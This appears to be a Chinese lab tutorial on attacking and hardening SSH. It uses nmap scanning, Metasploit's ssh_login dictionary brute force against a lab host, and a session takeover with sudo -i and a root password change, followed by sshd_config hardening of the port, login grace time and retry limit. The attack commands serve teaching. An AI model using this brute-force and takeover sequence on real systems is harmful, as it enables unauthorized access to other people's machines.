网络安全: Kali Linux 进行 SSH 渗透与防御

目录

一、实验

1.环境

2.nmap扫描目标主机

[3.Kali Linux 进行 SSH 渗透](#3.Kali Linux 进行 SSH 渗透)

[3.Kali Linux 进行 SSH 防御](#3.Kali Linux 进行 SSH 防御)

二、问题

1.SSH有哪些安全配置


一、实验

1.环境

(1)主机

表1 主机

|------------|--------|---------------------|-------------------|
| 系统 | 版本 | IP | 备注 |
| Kali Linux | 2022.4 | 192.168.204.154(动态) | |
| Ubuntu | 8.04 | 192.168.204.143 | Kali(2022.4)的目标主机 |

(2)查看Kali Linux (2022.4)系统版本

bash 复制代码
cat /etc/os-release

(3) 查看Kali Linux (2022.4)系统IP地址

bash 复制代码
ip addr | grep 154

(4)查看Ubuntu 8.04 系统版本及IP地址

bash 复制代码
lsb_release -a
bash 复制代码
ip addr

2.nmap扫描目标主机

(1)扫描⽬标主机所在⽹段所有存活的主机

 nmap -sP 192.168.204.0/24

(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本

22端口已开放

nmap -sV 192.168.204.143

3.Kali Linux 进行 SSH 渗透

(1)进入MSF 控制台

bash 复制代码
msfconsole

(2) 搜索 ssh_login脚本

bash 复制代码
search ssh_login

(3) 使⽤编号为 0 的脚本

use 0

(4) 设置⽬标主机

bash 复制代码
 set rhosts 192.168.204.143

(4)查看选项

bash 复制代码
show options

(5)设置用户名与密码本

bash 复制代码
 set username msfadmin
bash 复制代码
set pass_file zidian.txt

(6)运⾏脚本

bash 复制代码
run 

(7)查看会话

bash 复制代码
sessions

(8)连接会话

bash 复制代码
sessions 1

查看用户身份

bash 复制代码
whoami

查看路径

bash 复制代码
pwd

提升权限

bash 复制代码
 sudo -i

再次查看用户身份

bash 复制代码
whoami

更改密码

bash 复制代码
password root

(9)MobaXterm远程连接

连接

3.Kali Linux 进行 SSH 防御

(1)SSH安全配置(端口)

bash 复制代码
vim /etc/ssh/sshd_config

修改端口

(2)重启

bash 复制代码
/etc/init.d/ssh  restart

(3)退出之前的MSF

(5)进入MSF 控制台

bash 复制代码
msfconsole

(6) 搜索 ssh_login脚本

bash 复制代码
search ssh_login

(6) 使⽤编号为 0 的脚本

bash 复制代码
use 0

(7) 设置⽬标主机

bash 复制代码
 set rhosts 192.168.204.143

(8)设置用户名与密码本

bash 复制代码
 set username msfadmin
bash 复制代码
set pass_file zidian.txt

(9)运⾏脚本

失败

bash 复制代码
run 

(10)nmap扫描端口

ssh端口为12345

bash 复制代码
nmap -sV 192.168.204.143

(11)查看选项

bash 复制代码
show options

(12) 设置目标端口

bash 复制代码
set rport 12345

(13)运⾏脚本

bash 复制代码
run 

( 14)SSH安全配置(端口)

bash 复制代码
vim /etc/ssh/sshd_config

修改登录验证时间

(15)重启

bash 复制代码
/etc/init.d/ssh  restart

(16)验证(等待1分钟)

(17)SSH安全配置(容错次数)

bash 复制代码
vim /etc/ssh/sshd_config

修改容错次数

(18)重启

bash 复制代码
/etc/init.d/ssh  restart

(19)容错2次

二、问题

1.SSH有哪些安全配置

(1)配置

bash 复制代码
Port 12345            //端口                                  
LoginGraceTime 1m     //登录验证耗时                               
PermitRootLogin no    //不允许root远程登录                              
MaxAuthTries 2        //最大容错次数2                                
AllowUsers msfadmin@192.168.204.100    //允许指定用户在指定IP上登录

2.MSF 退出报错

(1)报错

bash 复制代码
[*] You have active sessions open, to exit anyway type "exit -y"

(2)原因分析

有session会话正在运行。

(3)解决方法

bash 复制代码
exit -y
相关推荐
筱小虾米44 分钟前
解决SSL VPN客户端一直提示无法连接服务器的问题
运维·服务器
dntktop3 小时前
内嵌编辑器+AI助手,Wave Terminal打造终端新体验
运维
Peter_chq4 小时前
【计算机网络】多路转接之select
linux·c语言·开发语言·网络·c++·后端·select
太阳风暴4 小时前
Ubuntu-修改左Alt和Win键位置关系
linux·ubuntu·修改键盘·键盘映射
kaiyuanheshang5 小时前
docker 中的entrypoint和cmd指令
运维·docker·容器·cmd·entrypoint
wanhengwangluo5 小时前
裸金属服务器能够帮助企业解决哪些问题?
运维·服务器
Python私教6 小时前
除了 Docker,还有哪些类似的容器技术?
运维·docker·容器
titxixYY6 小时前
SElinux
linux·运维·服务器
聚名网7 小时前
手机无法连接服务器1302什么意思?
运维·服务器·智能手机